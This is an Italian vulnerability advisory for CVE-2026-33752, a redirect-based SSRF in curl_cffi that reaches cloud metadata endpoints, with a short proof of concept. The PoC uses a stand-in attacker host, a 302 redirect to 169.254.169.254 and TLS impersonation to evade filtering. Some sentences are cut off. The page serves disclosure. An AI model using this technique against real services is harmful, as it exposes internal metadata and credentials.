
Dimostra una vulnerabilità SSRF basata su reindirizzamento in curl_cffi che consente l'accesso alla rete interna, con codice PoC e analisi del bypass dell'impersonificazione TLS.
CVE-2026-33752 (SSRF basato su reindirizzamento che porta all'accesso alla rete interna in curl_cffi)
curl_cffi non limita le richieste agli intervalli IP interni e segue automaticamente i reindirizzamenti tramite la libreria libcurl sottostante.
Per questo motivo, un URL controllato da un attaccante può reindirizzare le richieste verso servizi interni come gli endpoint di metadati cloud. Inoltre, la funzionalità di impersonificazione TLS di curl_cffi può far apparire queste richieste come traffico legittimo di un browser, il che potrebbe aggirare alcuni controlli di rete.
Il problema deriva da come curl_cffi gestisce le richieste in uscita
Ciò significa che, anche se un'applicazione consente solo richieste verso URL esterni, un attaccante può
Di conseguenza, gli endpoint interni (come le API di metadati delle istanze cloud) possono essere accessibili.
Inoltre, curl_cffi supporta l'impersonificazione dell'impronta TLS (ad es., impersonate="chrome"). In ambienti in cui le richieste in uscita vengono filtrate in base all'impronta TLS, ciò può rendere tali richieste più difficili da rilevare o bloccare.
Questo comportamento è simile a problemi SSRF basati su reindirizzamento precedentemente segnalati come CVE-2025-68616, in cui i reindirizzamenti consentivano l'accesso a risorse interne non intenzionali.
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/
Codice della vittima:
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)
Risultato
import curl_cffi\
resp = curl_cffi.get(
"https://attacker.example/test",
impersonate="chrome")
In alcuni ambienti, ciò può aiutare la richiesta ad aggirare i controlli di filtraggio basati su TLS.
Un attaccante che può controllare l'URL richiesto potrebbe essere in grado di: